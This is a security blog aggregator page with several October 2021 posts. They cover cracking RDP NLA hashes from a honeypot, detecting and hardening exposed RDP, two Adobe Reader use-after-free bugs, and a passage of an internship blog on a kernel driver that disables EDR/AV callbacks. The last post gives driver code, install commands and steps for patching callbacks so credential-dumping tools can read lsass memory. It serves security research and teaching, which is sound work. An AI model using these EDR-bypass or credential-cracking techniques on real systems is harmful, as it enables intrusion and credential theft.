🔒
There are new articles available, click to refresh the page.
Yesterday — 22 October 2021Research - Companies

Threat Roundup for October 15 to October 22

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 15 and Oct. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]
Before yesterdayResearch - Companies

Cracking RDP NLA Supplied Credentials for Threat Intelligence

21 October 2021 at 19:40
By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server software that supported NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authentication In” message from the client. At that point, it takes all the previous messages, performs some calculation on it, and compares it with the “MIC” stored in the “Authentication In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project we have open sourced here – https://github.com/nccgroup/nlahoney this includes:

Along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.

Threat Source newsletter (Oct. 21, 2021)

21 October 2021 at 18:00
 Newsletter compiled by Jon Munshaw.Good afternoon, Talos readers.   We're writing this on Wednesday for PTO reasons, so apologies if we miss any major news that happens after Wednesday afternoon.  Above, you can watch our awesome live stream from Monday with Brad Garnett from...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

21 October 2021 at 16:48

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop on systems remotely to manage one or more workstations and/or servers.  With the increase of organizations opting for remote work, so to has RDP usage over the internet increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389 making it very easy to discover by criminal threat actors.  Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and similar solutions such as TeamViewer (port 5958) and VNC (port 5900) are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.” 

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE- 2019-0708) first reported in May 2019 was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7.  Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

RDP logons or attacks will generate several log events in several event logs.  These events will be found on the target systems that had RDP sessions attempted or completed, or Active directory that handled the authentication.  These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior.  There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, if you can collect a low noise/volume high validity event from all endpoints into a log management solution, the better your malicious detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used and contain a lot of details about all authentication to a system, so a high volume event:

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging off
  • Workstation Name = This will be from the log of system being logged off from

Optionally, another logon can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used and contain a few details about session authentication to a system, so a low volume event:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name logging off
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login.  Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events and are on by default:

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, the Event ID 24 (disconnect) will be created after the logs have been cleared and then the user disconnects.  This allows tracing of the path of the user and/or treat actor took from system to system.

The following query logic can be used and contain a few details about RDP connections to a system, so a low volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need to have a solution or way to check each workstation and server for these events in the appropriate log or use a log management SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role that is added to a Windows Server that you publish to the internet that provides SSL (encrypted RDP over ports TCP 443 and UDP 3391) access instead of the RDP protocol over port 3389.  The RD Gateway option is more secure than just RDP alone, but still should be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN.  If VPN infrastructure is already in place, organizations have, or can easily adjust their firewalls to meet this.  Organizations should also monitor VPN logins for access attempts, and the source IP resolved to the country of origin.  Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before to internal systems via RDP.  However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port in which an attacker can then change their port target.

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance or Windows Firewall on the host machines managed by Group Policy to restrict RDP connections to known good IP addresses. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, this option is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.

Conclusion

Organizations should take careful consideration when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP. 

References and Additional Reading

CVE-2021-28632 & CVE-2021-39840: Bypassing Locks in Adobe Reader

21 October 2021 at 16:12

Over the past few months, Adobe has patched several remote code execution bugs in Adobe Acrobat and Reader that were reported by researcher Mark Vincent Yason (@MarkYason) through our program. Two of these bugs, in particular, CVE-2021-28632 and CVE-2021-39840, are related Use-After-Free bugs even though they were patched months apart. Mark has graciously provided this detailed write-up of these vulnerabilities and their root cause.


This blog post describes two Adobe Reader use-after-free vulnerabilities that I submitted to ZDI: One from the June 2021 patch (CVE-2021-28632) and one from the September 2021 patch (CVE-2021-39840). An interesting aspect about these two bugs is that they are related – the first bug was discovered via fuzzing and the second bug was discovered by reverse engineering and then bypassing the patch for the first bug.

CVE-2021-28632: Understanding Field Locks

One early morning while doing my routine crash analysis, one Adobe Reader crash caught my attention:

After a couple of hours minimizing and cleaning up the fuzzer-generated PDF file, the resulting simplified proof-of-concept (PoC) was as follows:

PDF portion (important parts only):

JavaScript portion:

The crash involved a use-after-free of CPDField objects. CPDField objects are internal AcroForm.api C++ objects that represent text fields, button fields, etc. in interactive forms.

In the PDF portion above, two CPDField objects are created to represent the two text fields named fieldParent and fieldChild. Note that the created objects have the type CTextField, a subclass of CPDField, which is used for text fields. To simplify the discussion, they will be referred to as CPDField objects.

An important component for triggering the bug is that fieldChild should be a descendant of fieldParent by specifying it in the /Kids key of the fieldParent PDF object dictionary (see [A] above) as documented in the PDF file format specification:

img01.jpg

Another important concept relating to the bug is that to prevent a CPDField object from being freed while it is in use, an internal property named LockFieldProp is used. Internal properties of CPDField objects are stored via a C++ map member variable.

If LockFieldProp is not zero, it means that the CPDField object is locked and can't be freed; if it is zero or is not set, it means that the CPDField object is unlocked and can be freed. Below is the visual representation of the two CPDField objects in the PoC before the field locking code (discussed later) is called: fieldParent is unlocked (LockFieldProp is 0) and is in green, and fieldChild is also unlocked (LockFieldProp is not set) and is also in green:

img02.jpg

On the JavaScript portion of the PoC, the code sets up a JavaScript callback so that when the “Format” event is triggered for fieldParent, a custom JavaScript function callback() will be executed [2]. The JavaScript code then triggers a “Format” event by setting the textSize property of fieldParent [3]. Internally, this executes the textSize property setter of JavaScript Field objects in AcroForm.api.

One of the first actions of the textSize property setter in AcroForm.api is to call the following field locking code against fieldParent:

The above code locks the CPDField object passed to it by setting its LockFieldProp property to 1 [AA].

After executing the field locking code, the lock state of fieldParent (locked: in red) and fieldChild (unlocked: in green) are as follows:

img03.jpg

Note that in the later versions of Adobe Reader, the value of LockFieldProp is a pointer to a counter instead of being set with the value 1 or 0.

Next, the textSize property setter in AcroForm.api calls the following recursive CPDField method where the use-after-free occurs:

On the first call to the above method, the this pointer points to the locked fieldParent CPDField object. Because it has no associated widget [aa], the method performs a recursive call [cc] with the this pointer pointing to each of fieldParent's children [bb].

Therefore, on the second call to the above method, the this pointer points to the fieldChild CPDField object, and since it has an associated widget (see [B] in the PDF portion of the PoC), a notification will be triggered [dd] that results in the custom JavaScript callback() function to be executed. As shown in the previous illustration, the locking code only locked fieldParent while fieldChild is left unlocked. Because fieldChild is unlocked, the removeField("fieldChild") call in the custom JavaScript callback() function (see [1] in the JavaScript portion of the PoC) succeeds in freeing the fieldChild CPDField object. This leads to the this pointer in the recursive method to become a dangling pointer after the call in [dd]. The dangling this pointer is later dereferenced resulting in the crash.

This first vulnerability was patched in June 2021 by Adobe and assigned CVE-2021-28632.

CVE-2021-39840: Reversing Patch and Bypassing Locks

I was curious to see how Adobe patched CVE-2021-28632, so after the patch was released, I decided to look at the updated AcroForm.api.

Upon reversing the updated field locking code, I noticed an addition of a call to a method that locks the passed field’s immediate descendants:

With the added code, both fieldParent and fieldChild will be locked and the PoC for the first bug will fail in freeing fieldChild:

img04.jpg

While assessing the updated code and thinking, I arrived at a thought: since the locking code only additionally locks the immediate descendants of the field, what if the field has a non-immediate descendant?... a grandchild field! I quickly modified the PoC for CVE-2021-28632 to the following:

PDF portion (important parts only):

JavaScript portion:

And then loaded the updated PoC in Adobe Reader under a debugger, hit go... and crash!

The patch was bypassed, and Adobe Reader crashed at the same location in the previously discussed recursive method where the use-after-free originally occurred.

Upon further analysis, I confirmed that the illustration below was the state of the field locks when the recursive method was called. Notice that fieldGrandChild is unlocked, and therefore, can be freed:

img05.jpg

The recursive CPDField method started with the this pointer pointing to fieldParent, and then called itself with the this pointer pointing to fieldChild, and then called itself again with the this pointer pointing to fieldGrandChild. Since fieldGrandChild has an attached widget, the JavaScript callback() function that frees fieldGrandChild was executed, effectively making the this pointer a dangling pointer.

This second vulnerability was patched in September 2021 by Adobe and assigned CVE-2021-39840.

Controlling Field Objects

Control of the freed CPDField object is straightforward via JavaScript: after the CPDField object is freed via the removeField() call, the JavaScript code can spray the heap with similarly sized data or an object to replace the contents of the freed CPDField object.

When I submitted my reports to ZDI, I included a second PoC that demonstrates full control of the CPDField object and then dereferences a controlled, virtual function table pointer:

Conclusion

Implementation of object trees, particularly those in applications where the objects can be controlled and destroyed arbitrarily, is prone to use-after-free vulnerabilities. For developers, special attention must be made to the implementation of object reference tracking and object locking. For vulnerability researchers, they represent opportunities for uncovering interesting vulnerabilities.


Thanks again to Mark for providing this thorough write-up. He has contributed many bugs to the ZDI program over the last few years, and we certainly hope to see more submissions from him in the future. Until then, follow the team for the latest in exploit techniques and security patches.

CVE-2021-28632 & CVE-2021-39840: Bypassing Locks in Adobe Reader

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
